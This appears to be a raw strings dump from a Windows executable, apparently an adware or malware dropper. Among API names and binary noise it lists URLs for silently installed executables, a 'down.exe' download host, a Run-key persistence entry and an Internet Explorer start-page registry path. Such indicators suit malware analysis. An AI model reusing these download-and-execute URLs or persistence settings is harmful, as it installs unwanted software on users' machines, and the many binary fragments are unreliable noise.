GetClipBox
GetClipRgn
GetCommandLineA
GetConnectString
GetCPInfo
GetCurrentObject
GetCurrentProcess
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDesktopWindow
GetDeviceCaps
GetDIBits
GetDlgCtrlID
GetDlgItem
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
GetFileSize
GetFileTime
GetFileTitleA
GetFileType
GetFocus
GetForegroundWindow
GetFullPathNameA
GetKeyState
GetLastActivePopup
GetLastError
GetLocalTime
GetMenu
GetMenuCheckMarkDimensions
GetMenuItemCount
GetMenuItemID
GetMenuState
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleHandleA
GetMonitorInfoA
GetNextDlgTabItem
GetObjectA
GetOEMCP
GetOpenFileNameA
GetParent
GetPolyFillMode
GetProcAddress
GetProcessHeap
GetProcessVersion
GetProfileStringA
GetPropA
GetROP2
GetSaveFileNameA
GetScrollPos
GetScrollRange
GetStartupInfoA
GetStdHandle
GetStockObject
GetStretchBltMode
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemMenu
GetSystemMetrics
GetSystemPaletteEntries
GetSystemTime
GetTabList
GetTextColor
GetTextExtentPoint32A
GetTextMetricsA
GetTickCount
GetTimeZoneInformation
GetTopWindow
GetVersion
GetVersionExA
GetViewportExtEx
GetViewportOrgEx
GetVolumeInformationA
GetWindow
GetWindowDC
GetWindowExtEx
GetWindowLongA
GetWindowOrgEx
GetWindowPlacement
GetWindowRect
GetWindowTextA
GetWindowTextLengthA
 (*.GIF)|*.GIF|
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalReAlloc
GlobalSize
GlobalUnlock
GrayStringA
`h````
h9n`u;
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
hgjlkbrfzaoe
HHtiHtGH
HHtpHHtl
H:mm:ss
HrCg@b	g 
HSVHWtgHHtF
Ht#HHt
HtHHt(
HtHHuz
HtOHt)H
HtTHtFHt8Ht*Ht
HTTP/1.0
http://dlsw.br.baidu.com/ditui/zujian/BaiduAn.Setup.1117.4.0.0.516_1000151945.exe
http://dlsw.br.baidu.com/ditui/zujian/BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe
http://dlsw.br.baidu.com/ditui/zujian/Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe
http://dlsw.br.baidu.com/ditui/zujian/bdBrowserSetup-5956-ftn_1000151945.exe
http://download.58611.net:8181/haozip_silent/haozip_silent_782130248.exe
http://download.58611.net:8181/kuwo_silent/kuwo_silent_782130248.exe
http://download.58611.net:8181/pic/pic_silent_782130248.exe
http://download.58611.net:8181/pinyin/bdpinyin_silent_782130248.exe
http://download.58611.net:8181/pps/pps_silent_782130248.exe
http://download.58611.net:8181/pptv_silent/PPTV_forqd3036_02134.exe
http://download.58611.net:8181/qqPCTray_silent/qqpcmgr_silent_782130248.exe
http://d.union.ijinshan.com/duba/link/dscKAVSETUPS_66_130903.exe
http://jifendownload.2345.cn/jifen_2345/2345explorer_k87648162.exe
http://jifendownload.2345.cn/jifen_2345/2345haozip_k87648162.exe
http://jifendownload.2345.cn/jifen_2345/2345pcsafe_k87648162.exe
http://jifendownload.2345.cn/jifen_2345/lkfish_k87648162_332947.exe
http://nb.cache.baidupcs.com/file/e15788e5a4a5bc4ccbd8acfccccddd3b?bkt=p2-qd-294&xcode=57d758161f66de706ccd294c1df1f083ad23dfac9bf6b2990b2977702d3e6764&fid=1801360174-250528-100554078920541&time=1427860893&sign=FDTAXERLBH-DCb740ccc5511e5e8fedcff06b081203-FFbapq2m6pKvQgf68PPDkIbWRiQ%3D&to=nbc&fm=Nan,B,M,ny&sta_dx=2&sta_cs=1&sta_ft=exe&sta_ct=0&newver=1&newfm=1&flow_ver=3&sl=80347212&expires=8h&rt=sh&r=417997622&mlogid=3844192640&vuk=137491712&vbdid=3540108374&fin=7654%E9%9D%99%E9%BB%98%E5%8C%85.exe&fn=7654%E9%9D%99%E9%BB%98%E5%8C%85.exe
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
http://u.dl.baofeng.com/upload/bdsBaofeng5%5B%5B1671_02134%5D%5D.exe
http://www.2345.com/?k87648162
http://www.markddos.com:8555/down.exe
hWj@_;
_hypot
 (*.ICO)|*.ICO|
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
#ifdef _WIN32
ImageList_Destroy
#include "l.chs\afxres.rc"          // Standard components
InflateRect
InitCommonControlsEx
InitializeCriticalSection
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
InternetCanonicalizeUrlA
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetOpenA
InternetReadFile
InternetSetOptionA
IntersectRect
InvalidateRect
iphlpapi.dll
IQh0MH
IQh8MH
IQh<RH
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsChild
IsDialogMessageA
IsIconic
IsRectEmpty
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
It#Iu%
\$\}-j
JanFebMarAprMayJunJulAugSepOctNovDec
January
jBWVSSQ
JPEGMEM
 (*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
 (*.JPG)|*.JPG|BMP
j VUPWQ
KERNEL32
Kernel32.dll
KERNEL32.dll
KillTimer
kXEQ>\u
^l_^][
;l$ }:
L$ ]_^
L$0PQR
L$0PQS
L$0SUV@W
L23fff&ff
L$,_^]3
L$,_[3
L$4_^3
L$4_^[d
L$4S+L$0Qj
L$4UQWP
L$4VQUP
L$4WPQR
L$4WQUVS
L$8^]_3
L$8_^][d
L$8WPQR
LANGUAGE 4, 2
LCMapStringA
LCMapStringW
L$`_^][d
L$|_^][d
L$ ^][d
L$ _^d
L$ _^][d
L$,_^][d
L$(_^][d
L$@^[d
L$@_^][d
L$$^[d
L$$^]d
L$$_^d
L$$_^][d
L$\_^][d
L$D_^[d
L$D_^][d
L$D_]d
L$DPQj
L$DSVQ
LeaveCriticalSection
l	g~b0R 
l	g~b0Rdk
L$h_^]3
L$h_^][d
L$H_^][d
L$H][d
L$Hj&Q
l$HQRVU
L$HSUVWP
L$$hxOH
LineTo
L$L_^]3
L$l_^][d
L$L^[d
L$L_^][d
L$LPQR
L$lRVQ
LoadBitmapA
LoadCursorA
LoadIconA
LoadImageA
LoadLibraryA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LocalReAlloc
LockFile
LockResource
L$P_^d
L$P_]^[d
L$ PQh
L$(PQR
L$@PQR
L$<PQVV
L$pRPQ
LPtoDP
L$(PVQ
L$ QSR
L$,RPQ
L$(RPQ
L$<RPQW
L$@RQj
L$@RUQ
L$<SQR
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
L$,SUV
L$(SUV
L$T_^]
L$t_^d
L$t][d
L$T_^]d
L$T_^][d
|$LtE;
L$TSWQ
L$(UUh
\$lUV3
L$(VQRSP
L$(VQVj
l$@VW3
l$<VWj
L$ WPQ
L$(WQR
L$(WSR
L$X_^]3
L$x_^d
L$x_^][d
L$X_^d
L$X;L$
L$XSQh
@;l$\~Z
mailto:
MapWindowPoints
M/d/yy
MessageBoxA
MGridCells
Microsoft Visual C++ Runtime Library
midiOutPrepareHeader
midiOutReset
midiOutUnprepareHeader
midiStreamClose
midiStreamOpen
midiStreamOut
midiStreamProperty
midiStreamRestart
midiStreamStop
 (*.MID)|*.MID|
MIME-Version: 1.0
ModifyMenuA
Monday
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
MoveToEx
MoveWindow
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mpr.dll
MPR.dll
MS Sans Serif
MS Shell Dlg
__MSVCRT_HEAP_SELECT
MulDiv
MultiByteToWideChar
n0SSSSU
-NbkSbpS
-NbkSbpS(
nd9~dt
N/f@b	g
NH_^][
Nh;NX|
-N"N1Y
N*Ncktepe
N*Ntepe
N*N(W%
N*N(W0
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
nt2Ht#Ht
NTRPQj
(null)
N$~	WU
NX9NXu 
Nyt2S	W	w	w
nzzpenc
O(_^][
o0SSSSU
October
offffff
OffsetRect
OffsetViewportOrgEx
O hP"J
ole32.dll
OLEAUT32.dll
OleInitialize
OleUninitialize
OpenClipboard
OpenDatabase
OpenPrinterA
O(uckHr
out.prn
OX[0R 
~P9~Pun
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
PA#define _AFX_NO_SPLITTER_RESOURCES
PatBlt
PathToRegion
.PAVCArchiveException@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.PAVCObject@@
.PAVCResourceException@@
.PAVCSimpleException@@
.PAVCUserException@@
PeekMessageA
Ph_^][Y
P#include "afxres.h"
PostMessageA
PostQuitMessage
PPPPhd
PPPPPPPP
P<PuWSV
ppxxxx
PQj WUS
PQQQQQ
\$ PQV
#pragma code_page(936)
PreviewPages
 (*.prn)|*.prn|
Program: 
<program name unknown>
P$RWPh
~'PSQR
PtInRect
PtVisible
- pure virtual function call
@PVj,S
\$PVUUS
PWVWWW
QPSWVR
QQSVW3
QQSVWd
QQSVWj
QQUWSS
QRWh`RH
QSh BH
QSUVWj
QX[gbL
RaiseException
RASAPI32.dll
RasGetConnectStatusA
RasHangUpA
`.rdata
ReadFile
RealizePalette
Rectangle
RectVisible
RedrawWindow
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegisterClassA
RegisterClipboardFormatA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueA
RegSetValueExA
ReleaseCapture
ReleaseDC
ReleaseSemaphore
RemovePlayer
RemovePropA
Reply-To: %s
resource.h
RestoreDC
ResumeThread
RoundRect
|$,RPQ
RSbpS\O
RtlUnwind
runtime error 
Runtime Error!
RVPUSQ
RWh`NH
Saturday
SaveDC
SbpS0R
SbpS@b	gu
SbpS:g:
SbpS\O
ScaleViewportExtEx
ScaleWindowExtEx
ScreenToClient
ScrollWindowEx
SelectClipRgn
SelectObject
SelectPalette
SendDlgItemMessageA
SendMessageA
September
SetActiveWindow
SetBkColor
SetBkMode
SetCapture
SetClipboardData
SetCurrentDirectoryA
SetCursor
SetCursorPos
SetEndOfFile
SetEnvironmentVariableA
SetErrorMode
SetEvent
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuItemBitmaps
SetParent
SetPolyFillMode
SetPropA
SetRect
SetRectEmpty
SetROP2
SetScrollPos
SetScrollRange
SetStdHandle
SetStretchBltMode
SetTextColor
SetTimer
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWindowExtEx
SetWindowLongA
SetWindowOrgEx
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
Shell32.dll
SHELL32.dll
ShellExecuteA
Shell_NotifyIconA
\shell\open\command
Shift+F1
Shift+F10
Shift+F11
Shift+F12
Shift+F2
Shift+F3
Shift+F4
Shift+F5
Shift+F6
Shift+F7
Shift+F8
Shift+F9
SHLWAPI.dll
ShowWindow
SING error
sO;>|C;~
software
Software\
Software\Microsoft\Internet Explorer\Main\Start Page
software\microsoft\windows\CurrentVersion\Run\sbds
%s <%s>
SS@SSPVSS
_SSSSU
StartDocA
StartPage
StretchBlt
Subject: %s
Sunday
SunMonTueWedThuFriSat
SWVVVRPV
System
SystemParametersInfoA
T$0h$OH
T$0PQR
T$0RPQ
T$0SUV
@t4Ht1Ht_Ht
T$8h$TH
T$8QRP
T$8RWj
t$ 90t
t	9p$u
t&9^$t
TabbedTextOutA
T$$+D$4
tD9_Pt?
T$DhPAH
T$dPQR
T$DPQRW
T$DQRU
T$DQSR
T$Du	f
T$DWRh
T$\;D$Xu
TerminateProcess
TextOutA
T/f&Tcknx
<]t_G<-uA
t{h(BH
!This program cannot be run in DOS mode.
t>Ht Ht
t+Ht$Ht
Thursday
T$H} VP
tI;Ftr
T$\jdSR
+tJHt:Ht*
TLOSS error
T$lPRh
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t$LUPh
T$LWUQVR
tn<%t2
tooltips_class32
To: %s
T$pPQR
t$PPVS
T$(PQR
T$\PQR
T$PQRP
T$ PQWWR
T$$PRV
tq9~Dt
T$(Qh@
T$ QRP
T$(QVURWP
TranslateAcceleratorA
TranslateMessage
tRHt}H
T$,RQP
t%RSQP
t$$RVP
T$<RVW
tS9~@uN
T$ SRh
T$,SRh
t$(SSh
t#SSUP
T$ SWRP
+ttHHtd
t.;t$$t(
Tuesday
T$\URP
t$$VSS
tvWWWWU
T$\WVR
t/WWUPj
 (*.txt)|*.txt|
T$XUSR
;t$Xu";\$\u
t$XWVS
tYhpTH
?u='@^
u._^][
u29l$xu,
u"8D$yu
u]9B uX
u	9~@u
>:u#FV
uh9^8uX
u-hn6F
ujhHOH
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
>:uNFV
UnhandledExceptionFilter
UnhookWindowsHookEx
UNLINK
UnlockFile
UnregisterClassA
UpdateWindow
uR9BxuM
uRFGHt
us-ascii
USER32
user32.dll
User32.dll
USER32.dll
u$SShe
\$(UVW
ValidateRect
VC20XC00U
V#D$,WPQ
VERSION.dll
Vh;VX|
VirtualAlloc
VirtualFree
\$<VW3
VWh=6F
VWtp9E
V,_^[Y
W9^du-
WaitForInputIdle
WaitForMultipleObjects
WaitForSingleObject
waveOutClose
waveOutGetNumDevs
waveOutOpen
waveOutPause
waveOutPrepareHeader
waveOutReset
waveOutUnprepareHeader
waveOutWrite
 (*.WAV;*.MID)|*.WAV;*.MID|WAV
 (*.WAV)|*.WAV|MIDI
Wednesday
	WG!2S(
WideCharToMultiByte
window
WindowFromPoint
windows
WinExec
WinHelpA
WININET.dll
WINMM.dll
WINSPOOL.DRV
WjdjdPQh
Wj(_Wj
|$$}$WP
(wqt\HHtS
WriteFile
WritePrivateProfileStringA
WS2_32.dll
WSOCK32.dll
wsprintfA
WTWindow
|$@ Wu
wwwwvf
wwwwvfo
wwwwww
wwwwwww
wwwwwwww
wwwwwwwww
wwwwwwwwwwwwwwwwwwwwwwww
XY[Z[]
Y;5DlH
YHYtLHt9
YX[(W	
_^][YY
|z;^<}uWS